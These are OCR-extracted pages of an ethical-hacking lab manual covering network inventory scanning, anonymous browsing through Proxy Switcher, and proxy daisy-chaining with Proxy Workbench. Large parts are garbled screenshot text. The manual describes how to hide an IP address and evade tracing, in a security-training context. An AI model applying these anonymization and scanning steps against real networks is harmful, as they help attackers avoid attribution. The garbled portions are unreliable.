Module 03 - Scanning Networks R = rGloba! Network Inventory ‫־‬ Unregistered M e v ie w 5<ar Tools R eports H elp ® ‫י‬$*]‫ס‬‫ב‬-‫־‬ H e p H B ]® e| •-•Eg & ‫׳״‬ NetBOS D pf Devices et30S | Shares £ Usercroups Jsers | Loaaedor g Q C i Mainboard ^ Memory n Msrrcryde/ces Port cornedas Qf System slots | Hotfixes ^ Secut) center £ Startup ■ Desktoo | *i ' jjjj — »" M 1 • 3 0 .‫גי‬ c t iU Svtte‫״‬ ig ) 1 3 i i i ' i u n i c i l | Scrrisca | -N»♦ z i Domr* V»ORC13ROUP |CDUMI«l4/) _!J Hcs‫׳‬ *sLan^ '*1N 0‫»־‬IR5HL9E4(COUNT■!47| z i rr^ a n p 3/22!20H 3 3&38FM [COUNT =147) . Ldcte Acxbat Upcare Ser!/ce , £ p fteanon E>o=r1ence 41loma1‫׳‬c Manual RufMrg R um rg ‫:־־‬ 'Png-an Filei [vf‫־‬fc)Comrmn Fite'iAdobi C‫־‬vV.mdowtsystem32svehott eye •k netsv . Appicanon Host Helper Service Automatic R j'i'irg C «V.»Klowt^1stern32fivch0ftexe •k apph( ^Appfcanon Idenfctji tpflr9r»0nlnf1‫־‬rml1on Manual Manual Stepped R im rg C‫*־‬fcmdow1svstem32svc*10ft.exe •k Local C »V.m<tem(tsystern32svcf10fr.exe •k net?•/ rewau Service‫־‬5Apftlcanon Layer. Manual Stepped C ,V,mdowtS3i5tem32Ulg ew> Apffcarion Manafjenenr Manual Stepped C »v!n<kw?system32svcf10‫־‬tt exe •k nelw I0lal1< 7 toart :J Oowoye^KOu^lUroupsResults fcitory depth lost icon lor to<h address V ie w re<ufts *1 *9 2 □ m N e ir c _ E % A ll addresses S f W O R K G R O U P •1 ‫־‬ y 'a a ’7 iw i‘N -D 3 8 ’‫״‬" ’ ;■ '1 6 0 .0 4 (W IN-ULY8... Ready FIGURE 11J20: Global Network Inventory Services Section 22. The Network Adapters section shows die Adapter IP and Adapter type. S To create a new custom report that includes more than one scan elem ent, click choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, custom ize settings as desired, and click the OK button ‫־‬1Global Network Inventory ‫־‬ Unregistered Q ' l l & <‫׳״‬ Reports Help □ e v Fie view Stan Tools I* ‫״‬ ^ D c * c c a [#J NetBIOS | ^ SK3X3 4■ U3cr<rouF3 JL• Uaera ^ Looocdon j| Conputer ‫ו*€>־ת‬ Q Prooeaaora Mom boane f j j Memory B?1 Memory devices y Pc‫׳‬ t c o r r c c to o Q System alota |^ H otfxca ^ Ccc^rfy eerier j * Startup |^ Deoksop H Scan s jrrrc rv ^ 8 0 S |‫׳‬jgj] O porstrg Syrtom h w Utod t cftvm o B Envtronmoat | ‫״‬j , S o rv cm h■ v®00 1- ?‫מ‬ | v |Etherrct QIC|N0 - Tinettarp:£/^2336:333 2 ‫־‬FM (COUNT-11 n ^ ^ v V ^ E t ,.|D 4 : B E :D 9 :C |1 0 0 .D 7 l2S2S .2g|1D C .01 [vicreolt Iotall 1enlj V c w r c s u R ; ▼ ‫ל‬ X r-l ^ □ E $ Narre B 1^‫י‬ All addr*<«#< y ~ * £ W O R K G R O U P ■- m o ‫״‬M ( w n ' u’l ^ " ." ’ ^jjjte^e^roup^lU^oup^^esujt^jjto^jepth^as^a^o^scj^ddrts^Rea^ & A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory u ses a blank password FIGURE 11.21: Global Network Inventory Network Adapter tab Lab Analysis Document all die IP addresses, open ports and miming applications, and protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 198
Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved IP Scan Range: 10.0.0.1 —10.0.0.50 Scanned IP Address: 10.0.0.7,10.0.0.4 Result: ■ Scan summary Global Netw ork ■ Bios Inventory ■ Memory ■ NetBIOS ■ UserGroup ■ Logged On ■ Port connector ■ Services ■ Network Adapter P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Can Global Network Inventory audit remote computers and network appliances, and if yes, how? 2. How can you export the Global Network agent to a shared network directory? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 199
Module 03 - Scanning Networks Anonymous Browsing using Proxy Switcher Proxy Switcherallowsyou to automatically executeactions; basedon the detected netnork connection. Lab Scenario 111 the previous lab, you gathered information like scan summary, NetBIOS details, services running on a computer, etc. using Global Network Inventory. NetBIOS provides programs with a uniform set of commands for requesting the lower-level services that the programs must have to manage names, conduct sessions, and send datagrams between nodes on a network. Vulnerability lias been identified in Microsoft Windows, which involves one of the NetBIOS over TCP/IP (NetBT) services, the NetBIOS Name Server (NBNS). With this service, the attacker can find a computer’s IP address by using its NetBIOS name, and vice versa. The response to a NetBT name service query may contain random data from the destination computer’s memory; an attacker could seek to exploit this vulnerability by sending the destination computer a NetBT name service query and then looking carefully at the response to determine whether any random data from that computer's memory is included. As an expert penetration tester, you should follow typical security practices, to block such Internet-based attacks block the port 137 User Datagram Protocol (UDP) at the firewall. You must also understand how networks are scanned using Proxy Switcher. Lab Objectives This lab will show you how networks can be scanned and how to use Proxy Switcher. It will teach you how to: ■ Hide your IP address from the websites you visit ■ Proxy server switching for improved anonymous surfing I C O N K E Y p=7 Valuable information Test your knowledge w Web exercise Q Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 200
Module 03 - Scanning Networks Lab Environment To cany out the lab, you need: ■ Proxy Switcher is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Switcher ■ You can also download the latest version o f Proxy Workbench from this link http:/ / www.proxyswitcher.com/ ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows Server 2012 ■ A web browser with Internet access ■ Follow’Wizard-driven installation steps to install Proxy Switcher ■ Administrative privileges to run tools Lab Duration Time: 15 Minutes Overview of Proxy Switcher Proxy Switcher allows you to automatically execute actions, based on the detected network connection. As the name indicates, Proxy Switcher comes with some default actions, for example, setting proxy settings for Internet Explorer, Firefox, and Opera. Lab Tasks 1. Install Proxy Workbench in Windows Server 2012 (Host Machine) 2. Proxy Switcher is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Sw itcher 3. Follow’ the wizard-driven installation steps and install it in all platforms of the W indows operating system . 4. This lab will work in the CEH lab environment - on W indows Server 2012, W indows Server 2008, and W indows 7 5. Open the Firefox browser in your Windows Server 2012, go to Tools, and click Options in die menu bar. 2 " Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Cl Automatic change of proxy configurations (or any other action) based on network information Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 201
Module 03 - Scanning Networks G o ogle M o iillo Firefox fi *e •!1• -■cc9u Docum ents Calendar M ote • Sign n colt| HtJp Qownloatfs CW-I moderns cm *v‫*«״‬A S<* UpS^K. Web Developer Page Info Cle«r Recent Ustsr. 01+“ Sh1ft*IW ♦You Search Images Google Gocgle Search I'm feeling Lucky •Google Aboul Google Google comA6.««t>11ng P iogam m ei Business SolUion* P iracy t Te FIGURE 121: Firefox options tab 6. Go to die Advanced profile in die Options wizard of Firefox, and select Network tab, and dien click Settings. Options &‫ם‬ ‫י‬ § % p * k 3 G e n e ra l T a b s C o n te n t A p p lic a tio n s P riv a c y S e c u rity S>nc A d v a n c e d | S g t n g i . C le a r N o w C le a r N o v/ Exceptions.. G e n e ra l | M etw orV j U p d a te | E n c ry p tio n j C o n n e c tio n C o n fig u r e h o w h r e f o i c o n n e c ts t o th e Intern et C a c h e d W e b C o n te n t Y o u r v re b c o n te n t c a c h e 5 ‫י‬c u rre n tly u sin g 8 .7 M B o f d is k sp a c e I I O v e rrid e a u to m a t e c a c h e m a n a g e m e n t Limit cache to | 1024-9] MB of space O fflin e W e b C o n te n t a n d U se r D ata Y o u 1 a p p lic a tio n c a c h e is c j ir e n t l/ u s in g 0 b y te s 01 d is k s p a c e M T ell m e w h e n a w efccite aclrt t o s to re H at* fo r o fflin e u ce T h e fo llo v /in g tv e b site s a re a lo w e d t o s to re data fo r o fflin e u s e Bar eve.. H e lpC a n c e lO K FIGURE 122 Firefox Network Settings 7. Select die Use System proxy settings radio button, and click OK. C3Often different internet connections require com pletely different proxy server settings and it's a real pain to change them manually 3‫׳‬k Proxy Switcher fully compatible with Internet Explorer, Firefox, Opera and other programs Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 202
Module 03 - Scanning Networks ‫־‬ ‫י‬ ‫י‬ ‫י‬Connection Settings Configure Poxies to Access the Internet O No prox^ '‫)־‬ Auto-detect proxy settings for this network (•) Use system proxy settings Manual proxy configuration: HTTP 5rojjy: 127.0.0.1 @ Uje this prcxy server for all protocols Pfirt Port Port SSLVoxy: 127.0.0.1 FTP *roxy. 127.0.0.1 SOCKS H ost 127.0.0.1 O SOCKS v4 ® SOCKS v5 No Pro>y fo r localhcst, 127.0.0.1 Reload Example: .mozilla.org, .net.nz, 192.168.1.0/24 O Automatic proxy configuration URL: HelpCancelOK fi proxy switcher supports following command line options: -d: Activate direct connection FIGURE 12.3: Firefox Connection Settings 8. Now to Install Proxy Switcher Standard, follow the wizard-driven installation steps. 9. To launch Proxy Switcher Standard, go to Start menu by hovering die mouse cursor in die lower-left corner of the desktop. FIGURE 124: WmdcKvs Server 2012 - Desktop view 10. Click die Proxy Switcher Standard app to open die Proxy Switcher window. OR T A S K 1 Proxy Servers Downloading Click Proxy Switcher from die Tray Icon list. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 203
Module 03 - Scanning Networks Start Administrator^ Server W indows G oogle Hyper-V Global M anager Powershell Chrom e M anager Network Inventory Fs b W * 91 SI C om puter Control Hyper-V Panel Machine... Centof... y v 9 K . Com m and M021I* PKKVSw* Prom pt Frefox vrr <0 *£«p«- * Proxy Checker CM*up ,‫י‬ .‫ר‬► FIGURE 125: Windows Server 2012 - Apps s Server. at* o Customize... jate Datacenter A / Q t— 1 l A r - r ‫׳‬1‫״‬ / ! ^Dp^uild 8400 FIGURE 126: Select Proxy Switcher 11. The Proxy List Wizard will appear as shown in die following figure; click Next Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited £□ Proxy Switcher is free to use without limitations for personal and commercial use ‫ם‬ if the server becomes inaccessible Proxy Switcher will try to find working proxy server ‫־‬ a reddish background will be displayed till a working proxy server is found. C E H Lab M anual Page 204
Module 03 - Scanning Networks £3‫־‬ Proxy Switcher ssupports for LAN, dialup, VPN and other RAS connections 12. Select die Find New Server, Rescan Server, Recheck Dead radio button fiom Common Task, and click Finish. & ‫־‬ Proxy switching from command line (can be used at logon to automatically set connection settings). 13. A list of downloaded proxy servers will show in die left panel. Proxy List Wizard Uang this wizard you can qc*ckly complete common proxy lot managment tasks Cick finish to continue. Common Tasks (•) find New Servers. Rescan Servers. Recheck Dead O Find 100 New Proxy Servers O find New Proxy Severs Located in a Specific Country O Rescan Working and Anonymous Proxy Servers CanedFinish< Back0 Show Wizard on Startup FIGURE 12.8: Select common tasks Proxy List Wizard Welcome to the Proxy Switcher Using this wizard you can quickly complete common proxy list managment tasks. To continue, dick Next CanedNext >@ Show Wizard on Startup <Back FIGURE 127: Proxy List wizard Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 205
Module 03 - Scanning Networks I MProxy Switcher Unregistered ( Direct Connection ] F ile E d it A c t io n s V ie w H e lp ‫א‬Filer Proxy Servers A Roxy Scanner Serve* State ResDDnte Countiy * N e w (683) ,? 93.151.160.1971080 Testira 17082ns H RJSSIAN FEDERATION B ‫&־‬ high Aronymsus (0) £ 93.151.180.195:1080 Teetirg 17035n« m a RJSSIAN FEDERATION SSL (0) 93.150.9.381C80 Testing 15631ns RJSSIAN FEDERATION £ : Brte(O) tu1rd-113-68 vprtage.com Lhtested i ‫מ‬ Dead (2871) , f 93 126.111213:80 Lhtested * UNITED STATES 2 Permanently (656?) £ 95.170.181 121 8080 Lht*ct*d m a RJSSIAN FEDERATION 1— Book. Anonymity (301) <? 95.159 368 ‫ו‬C Lhtested “ SYR;AM ARAD REPUBLIC ‫־‬£5-—‫ן‬ Pnva!e (15) 95.159.31.31:80 Lhtested — b‫׳‬ KAfJ AHAB KtPUBLIC V t t Dangerous (597) 95.159 3M 480 Lhtested “ SYRIAN ARAB REPUBLIC f~‫־‬& My P‫“׳‬ V Server• (0) , f 94.59.260 71:8118 Lhtoetod ^ 5 UNITED ARAB EMIRATES :— PnwcySwitchcr (0) * - .............. __ L>!tested___ C UNITED ARB EMIRATES Caned Fbu‫»׳‬d 1500 MZ3 28 kb ProgressState Conpbte Conpfcte S tefre Core PrcxyNet wviwaliveproxy.com mw.cyberayndrome.net‫״‬ <w!wnrtime.com DL & FIGURE 129: List of downloadeed Prosy Server 14. To stop downloading die proxy server click L=Jg' x 1Proxy Switcher Unregistered ( Direct Connection ) File Edit Actions View Help «filer F ox/ Servers r Couriry J HONG KONG | ITALY »: REPUBLIC OF KOREA “ NETHERLANDS !ITALY ™ UNITED ARAB EMIRATES •: REPUBLICOF KOREA 5 SWEDEN “ SYRIAN ARAB REPUBLIC ” SYRIAN ARAB REPUBLIC — CZECH REPUBLIC Serve* Slate Resroroe £ 001 147 48 1€‫־‬ *»«twn«t (Aliv«-SSL) 13810nt £ 1 ‫ס‬‫י‬1‫ב‬»‫זז»,ג‬95‫־‬10‫ד־‬54-159‫<:י‬* (Alive-SSL) 106Nh* £ 218152.121 184:8080 (Alive-SSL) 12259ns £ 95.211.152.218:3128 (Alive-SSL) 11185ns £ 95.110.159.54:3080 (Alive-SSL) 13401ns £ 9156129 24 8)80 (Alive-SSL) 11&D2ns u>4gpj 1133aneunc co (Alive-SSL) 11610m pjf dsd»cr/2'20Jcvonfcrc com: (.*Jive-SSL) 15331ns 91.144.44.86:3128 (Alive-SSL) 11271ns £ 91.144.44.88:8080 (.Alive-SSL) 11259ns 92.62.225.13080:‫ר־‬ (Alive-SSL) 11977ns ‫־‬ Proxy Scanner ♦ N#w (?195) H y A ic n y m o u o (0) I••••©‫׳‬ SSL (0) | fc?Bte(0) B ~ # Dead (1857) =••••{2' Perm anently 16844] Basic Anonymity (162) | ^ Private (1) j--& Dangerous 696) h ‫־‬& My Proxy Servers (0J - 5 ‫}־‬‫׳‬ ProocySwtcher (0) Cancel V Keep Ali/e Auto Swtcf‫־‬DsajleJ 108.21.5969:18221 tested 09 (Deod) bccousc ccrreoon bmed out 2 ' 3.864.103.80 tested as [Deod] because connectionllrrcd 0U 123.30.188.46:2214 tested as [Dead] Decause ccnrecaon tuned out. 68 134253.197 5563tested as [Dead] because comection •jmedout. FIGURE 1210: Click on Start button 15. Click Basic Anonymity in die right panel; it shows a list of downloaded proxy servers. When Proxy Switcher is running in Keep-A.live mode it tries to maintain working proxy server connection by switching to different proxy server if current dies When active proxy server becomes inaccessible Proxy Switcher will pick different server from ProxySwitcher category If the active proxy server is currently a liv e the background will be green Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 206
Module 03 - Scanning Networks | _ ; o ^Proxy Switcher Unregistered ( Direct Connection) KA L i 0■ 0 A 1!l) 2) =*° *‘ ‫׳‬,‫״‬ File Edit Actions View Help & s►□ x Ia a a g ? Proxy Scanner Server State RespxKe Countiy j~ # New (853) ,f 91 14444 65 3128 (Alve-SSU 10160ns — SvRAfi ARAB REPUBI B ‫&־‬ Aronyrroue (0) <f 119252.170.34:80.. (Aive-SSU 99/2rre INDONESIA h & SSL(0) ,f 114110*4.353128 (Alve-SSL) 10705ns ^ INDONESIA Bte(0) f 41 164.142.154:3123 (Alve-SSU 12035ns ►)E SOUTH AFRICA ■‫»־‬-& Dead (2872) 3128?10149101‫כי‬2f, Alve 11206ns m BRAZIL Femanently (6925) ,f 2D3 66 4* 28C Alvo 10635n• H iTAIV/AM ‫־"׳‬1"<<...‘'‫י‬■1513 ,f 203254 223 54 8080 (Alve-SSL) 11037ns REPUBLIC OF KOREA — Pnvale (16) <f 200253146.5 8080 Alve 10790ns pg BRAZIL j~ & Dancerous (696) <f 199231 211 1078080 (Alve-SSU 10974m 1■& My Proxy Sorvoro (0) ,f 1376315.61:3128 (Alve-SSU 10892m P 3 BRAZIL -■‫־‬ PraxySwltcher (0) if 136233.112.23128 (Alve-SSU 11115ns 1 ‫ס‬ BRAZIL < 1 ■1 Caned Keep Alive Auto S w t d ‫־‬Dsabled 17738.179.2680tested as [Alwej 17738.179.26:80tested as [(Aive-SSU] 119252.170.34:80tested a< (Alive] 119252.170.34.80 tested as [(Alive-SSL)] 33/32 ISilli&SSitSiSk FIGURE 1211: Selecting downloaded Proxy server from Basic Anonymity 16. Select one Proxy server IP address from right panel to swich die selected proxy server, and click die icon.fTJ flit a 13 Proxy Sw itcher U nregistered ( D irect C onnection ) 1 ~ l~a ! * F ile E d it ,A c t io n s V ie w H e lp O # ‫׳‬ □ n [ a a . a a i f j 2 y A Lis | ‫/י‬ | Proxy S«rvera |X j State Hesponte Lointiy (Alve-SSU 10159ms “ SYRIAN ARAB REPUBLIC (Alve-SSL 1315‫־‬m [ J HONG KONG (Alve-SSU ‫*״‬10154 1 | ITALY Alh/e 10436ns REPUBLIC OF IQOREA (Alve-SSU 13556ns ;-S W E D E N (Alve-SSL:• n123me 1 ITALY (Alve-SSU 10741ns (Alve-SSU 10233ns ----- NETHERLANDS (Alve-SSU 10955ns REPUBLIC OF KOREA (Alve-SSL) 11251m “ HUNGARY (Alve-SSU 10931ns ^ ^ IRAfl (AlveSSU 15810ns S3£5 KENYA (Alve-SSU 10154ns “ SYRIAN ARAB REPUBLIC Server 91.14444.65:3123,f f 001.147.48.1 U .c ta b c r c t., 95.aem ef.&‫־‬1‫ל‬‫־‬? ,lx>stS4 1 59 218.152.121.184:3030,f 95.110159.545080 3i.S6.2‫־‬S.2-i.S)SD.. if 95.21 1 15 2 .21 8 :3 12 3 f u 5 4 jp j1 1 3 5 a T T S jn o coJcr:• ,f 91.82.65.173:8080 < f 8 6 .1 1 1 1A 4 .T 9 4.3 1 23 89.130.23128.‫ד‬4$ 3123861 4 4 4 4‫ו‬9f, £ 5P x » y S can n er (766)New‫*ל‬•••J (0)*rtg h Anorrym ou <0)S S L& (0)01B1te‫־־‬; (2381)B Y Dead (6925)7 $P e m a n e n tly.... '467)Basic Anonym ity (116ate‫׳‬Pn‫־‬ &h !‫׳‬696)Dangerous‫־‬ ‫־‬ &j (0)Proxy Ser/ere‫־‬ &r (0)ProxySvtttcher—: Ctaeblcd [[ Koep Alive ][ Auto S w tc h | h ‫׳‬ 218 152. 121.I84:8030tested as ((Alve-SSL:] 218.152.121.144:8030 tested as [Alive] ha*»54-159-l 10-95 s e n ie rie d ie a ti a m b a « 8 0 8 0 te 4 » d » (‫׳‬ A lv e-S S L )] 031 .1 4 7.4 8 .1 1 6 .w atb.n et/ig3tor.com :3123 teatsd 0 5 [(ASve SSL)) FIGURE 1212 Selecting the proxy server 17. The selected proxy server will connect, and it will show die following connection icon. £z‫־‬ When running in Auto Switch mode Proxy Switcher will switch active proxy servers regularly. Switching period can be set with a slider from 5 minutes to 10 seconds ^ In addition to standard add/remove/edit functions proxy manager contains functions useful for anonymous surfing and proxy availability testing Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 207
Module 03 - Scanning Networks Proxy Switcher Unregistered ( Active Proxy: 95.110.159.54:8030 ‫־‬ ITALY) I ~ l ‫ם‬ f x p F i kF ile E d it A c t io n s V ie w H e lp $ 5 Proxy Scanner Serve! State Response Comtiy H * New !766) £ 9 T.144 4^.65:3123 (Alve-SSU 10159ms “ SVRAM ARAB REPUBLIC Ugh Anonymous (0) 001.147.48.ilS.etatic.ret.. (Alve-SSU 13115n* [ J HONG KONG • g t SSL(O) , ? host54-159-110-95.server.. (Alve-SSU 10154ns | | I T M Y - ‫־־‬e? Bte(O) & 218.152.121.194:3030 Alive 10436n s > : REPJBLIC OF KOREA B - R Dead (2381) ,f dedserr2i 23Jevonlme to n (Alve-SSU 13556n s ■■SWEDEN P»m*n#ntly(G975) L 95 110159 54 8080 (Alve-SSU 1123‫־‬n.« I ITAtr 003‫.״‬ Anonymity(4G7) (Alve-SSU 107^0rn» UNI ILL) ARAD CMIRATCS Pnvate lib) ,? 95 211 152 218:3123 (Alve-SSU 10233n s “ NETHERLANDS | 0 ‫־־‬ Dangerous (696) u54aDJl133a‫׳‬r»unfl,co.kr:l (Alve-SSU 10955n s REP JBLIC OF KOREA l‫״‬ & My Proxy Servere (0) , f 91 82 £5 173:8080 (AlveSSU 1l251r»a “ HUNGARY (0)‫־‬25ProxySviitcha—: g 86.111 144.194.3128 (Alve-SSU 10931ns “ IRAG ,? 41.89.130^3128 (Alve-SSU 158101s g g K E N rA £ 91 14444 86 3123 (Alve-SSU 10194ns “ S ^ A N ARAB REPUBLIC ‫״י‬I> Dseblcd 11 Keep Alive |[" Auto Switch 2l8.152.121.1&4:8030tested as [fAlve-SSL! 218.152.121.184:8030tested as (Alive] h ost54 -1 59-110-95 9 »rverdedicati arnb a 8 ‫ג‬C80 tested as RAIve-SSL)] 031 .1 4 7.4 8 .1 16.atotc.nctvigator.con> :3123tested0 9 [(Mrvc SSL)) MLE a u c A n o n y m it y FIGURE 1213: Succesfiil connection of selected proxy 18. Go to a web browser (Firefox), and type die following URL http: / /w^v.proxyswitcher,com/ checLphp to check die selected proxy server comietivity; if it is successfully conncted, then it show's die following figure. r 1 0 ‫־‬ C x 1Detecting your location M07illa Firefox 3 ? £ri!t ¥"■'‫'״‬ History BookmorH Iool*• Jjdp C *‘I Go®,I. f i f ! 0*r»<ring your kx‫«־‬ io ‫׳‬v 4‫־‬ -.IUU-..J.UU,I 2 0 2 .5 3 .1 1 .1 3 0 , 1 9 2 .1 6 8 .1 .1 Unknown Your possible IP address is: Location: Proxy Inform ation Proxy Server: DFTFCTFD Proxy IP: 95.110.159.67 Proxy Country: Unknown FIGURE 1214: Detected Proxy server 19. Open anodier tab in die web browser, and surf anonymosly using diis proxy. £□ Starting from version 3.0 Proxy Switcher incorporates internal proxy server. It is useful when you want to use other applications (besides Internet Explorer) that support HTTP proxy via Proxy Switcher. By default it w aits for connections on localhost:3128 Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 208
Module 03 - Scanning Networks p ro x y server Cerca con Google - Mozilla Firefox rlc Edit yie * History Bookmark: Tools fcWp | p r a y i c ‫.־‬ « - C e ra con GoogleOttecbngyour location.. P *C ‫־‬ Gccgfc^ <9 wvw* g c o g k .it ?hb(t&g5_nf=1&pq-prcr)■ w r ‫^־‬rc?cr>- 0&g?_<l-22t51.1t>f-taq-pro>fy‫»־‬scfvcr& pt-p8b1»- *Tu R ic er ca Im m agin i M aps P la y Y ouT ube M ew s G m ail D ocu m en t! C a le n d a r U ttio proxy server Proxy Wikipodia it w kjpedia.otgAvikn'Proxy In informatica e telecom unica^ ow un p ro x y 6 un programma che si mlei pone tra un client ed un s e rv e r farendo da tram re o neerfaccia tra 1due host ow ero ... Altri usi del termrne Proxy P io x y H T TP Note V o a correlate Public Proxy Servers - Free Proxy Server List ivwiv p u b licproxyservers con V TiaCu a questa pagina Public P roxy Server* is a free and *!dependent proxy checking sy slem . O ur service helps you to protect your K ten tly and bypass surfing restrictions sin ce 2002. Proxy Servers - S o r e d B y Rating - Pro x y Servers Sorted B y Country - Useful Lin ks Proxy Server - Pest Secure, rree. Online Proxy w v w p ro x y se rv e r com ‫'׳‬ • Traduci questa pagma Thn boet fi!!*‫י‬ P io x y S erve r out thar®' S lo p searching a proxy list (or proxies that are never taut or do noi even get anl*1e P ro x y S e rv e r com has you covered from ... Proxoit - Cuida alia naviaazione anonima I proxy server Google Ricerca Immagini Maps V ideo M oaze Shopping Ptu contanuti ItaHa Cemtm locnKtA 0 3 After the anonymous proxy servers have become available for switching you can activate any one to become invisible for die sites you visit. FIGURE 1214: Surfusing Proxy server Lab Analysis Document all die IP addresses of live (SSL) proxy servers and the connectivity you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Proxy Switcher Server: List of available Proxy servers Selected Proxy Server IP Address: 95.110.159.54 Selected Proxy Country N am e: ITALY Resulted Proxy server IP Address: 95.110.159.67 P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Examine which technologies are used for Proxy Switcher. 2. Evaluate why Proxy Switcher is not open source. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 209
Module 03 - Scanning Networks Internet Connection Required es0 Y Platform Supported 0 Classroom □ No □ iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 210
Module 03 - Scanning Networks Lab w i 1 3 Daisy Chaining using Proxy Workbench Proxy Workbench is a uniquepivxy server, idealfor developers, security experts, and twiners, which displays data in realtime. Lab Scenario You have learned in the previous lab how to hide your actual IP using a Proxy Switcher and browse anonymously. Similarly an attacker with malicious intent can pose as someone else using a proxy server and gather information like account or bank details of an individual by performing social engineering. Once attacker gains relevant information he or she can hack into that individual’s bank account for online shopping. Attackers sometimes use multiple proxy servers for scanning and attacking, making it very difficult for administrators to trace die real source of attacks. As an administrator you should be able to prevent such attacks by deploying an intrusion detection system with which you can collect network information for analysis to determine if an attack or intrusion has occurred. You can also use Proxy Workbench to understand how networks are scanned. Lab Objectives This lab will show you how networks can be scanned and how to use Proxy Workbench. It will teach you how to: ■ Use the Proxy Workbench tool ■ Daisy chain the Windows Host Machine and Virtual Machines Lab Environment To carry out the lab, you need: ■ Proxy Workbench is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Workbench I C O N K E Y ‫־‬2 3 Valuable information Test your knowledge ‫ס‬ Web exercise m Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council AB Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 211
Module 03 - Scanning Networks You can also download die latest version o f Proxy Workbench from this link http://proxyworkbench.com If you decide to download the latest version, then screenshots shown in the lab might differ A computer running Windows Server 2012 as attacker (host machine) Another computer running Window Server 2008, and Windows 7 as victim (virtual machine) A web browser widi Internet access Follow Wizard-driven installation steps to install Proxy Workbench Administrative privileges to run tools Lab Duration Time: 20 Minutes Overview of Proxy Workbench Proxy Workbench is a proxy server diat displays its data in real time. The data flowing between web browser and web server even analyzes FTP in passive and active modes. Lab Tasks Install Proxy Workbench on all platforms of die Windows operating system ‫׳‬Windows Server 2012. Windows Server 2008. and Windows 7) Proxy Workbench is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Workbench You can also download the latest version o f Proxy Workbench from this link http ://proxyworkbench.com Follow the wizard-driven installation steps and install it in all platforms of Windows operating system This lab will work in the CEFI lab environment - on W indows Server 2012, W indows Server 2008‫י‬ and W indows 7 Open Firefox browser in your W indows Server 2012, and go to Tools and click options C E H Lab M anual Page 212 Ethical H acking and Counterm easures Copyright O by EC•Council AU Rights Reserved. Reproduction is Strictly Prohibited. C Security: Proxy servers provide a level of security within a - network. They can help prevent ‫ר‬ security attacks a s the only way into the network 4. from the Internet is via the proxy _ server 6. ZZ7 Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks
Module 03 - Scanning Networks Google Moiillo Firefox fi *e •!1• -■cc9u Docum ents Calendar M ote • Sign n colt | HtJp Downloads CW-I moderns a<*SM»A St*UpS^K. Web Developer PageInfo 9‫הי‬‫״זי‬6*«)‫ז‬1‫ו‬1£‫«ז‬5 Cle«r Recent Ustsr. 01+“Sh1ft*W ♦You Search Im ages Google Google Search I'm feeling Lucky • Google About Google Google comAtfM«t1«M1g P iogam m ei Business Soltiion* P iracy t Te FIGURE 13.1: Firefox options tab 7. Go to Advanced profile in die Options wizard of Firefox, and select die Network tab, and dien click Settings. Options &‫ם‬ ‫§י‬ % p 3G e n e ra l T a b s C o n te n t A p p lic a tio n s P iiv a c y S e c u rity S>nc A d v a n c e d | S g t n g i . C le a r N o w C le a r N o v/ Exceptions.. G e n e ra l | M etw orV j U p d a te | E n c ry p tio n j C o n n e c tio n C o n fig u r e h o w h r e f o i c o n n e c ts t o th e Intern et C a c h e d W e b C o n te n t Y o u r v re b c o n te n t c a c h e >sc u rre n tly u sin g 8 .7 M B o f d is k sp a c e I I O v e rrid e a u to m a t e c a c h e r r a n a g e m e n t Limitcache to | 1024-9] MB of space O fflin e W e b C o n te n t a n d U se r D ata Y o u 1 a p p lic a tio n c a c h e is c j iie n t l/ u s in g 0 b y te s o f d is k s p a c e M T e ll m e w h e n a *refccit* aclrt t o s to re H at* fo r o fflin e u ce T h e fo llo v /in g tv e b site s a te a lo w e d t o s to re data fo r o fflin e u s e Bareve.. H e lpC a n c e lO K FIGURE 13.2 Firefox Network Settings 